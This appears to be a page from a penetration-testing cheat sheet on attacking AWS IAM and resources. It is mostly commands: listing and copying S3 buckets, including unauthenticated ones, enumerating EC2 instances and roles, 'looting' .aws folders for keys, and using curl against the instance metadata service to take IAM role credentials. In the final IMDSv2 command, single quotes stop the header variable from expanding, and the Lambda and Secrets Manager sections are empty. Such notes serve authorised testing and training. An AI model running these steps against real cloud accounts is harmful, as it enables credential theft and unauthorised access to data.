search

IAM and Resource Attacks

hashtag
S3

aws s3 ls
aws s3 ls s3://bucket # Use --no-sign-request  for unauthenticated buckets.
aws s3 cp s3://bucket/flag.txt .

hashtag
EC2

IAM permissions over EC2s may allow you to execute commands, dump snapshots, and impersonate associated IAM roles. Make sure to loot the EC2's root and user .aws folders for keys.

# List EC2 main info and role
aws ec2 describe-instances --query "Reservations[*].Instances[*].[InstanceId,PublicIpAddress,State.Name,KeyName,IamInstanceProfile.Arn]"

# Network access
aws ec2 describe-security-groups
aws ec2 describe-network-interfaces

# IAM roles on EC2
aws ec2 describe-instances --query "Reservations[*].Instances[*].IamInstanceProfile.Arn"

Access keys may of course be obtained from the AWS IMDS via web requests from the EC2:

# Check for /iam/ -> Role assigned
curl http://169.254.169.254/latest/meta-data

# IMDSv1
curl http://169.254.169.254/latest/meta-data/iam/info
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLENAME

# IMDSv2 - Get Token
EC2_TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null || wget -q -O - --method PUT "http://169.254.169.254/latest/api/token" --header "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null)
HEADER="X-aws-ec2-metadata-token: $EC2_TOKEN"
curl -s -f -H '$HEADER' http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLENAME

hashtag
Lambda

hashtag
Secrets Manager

PreviousEnumerationNextGCP

Last updated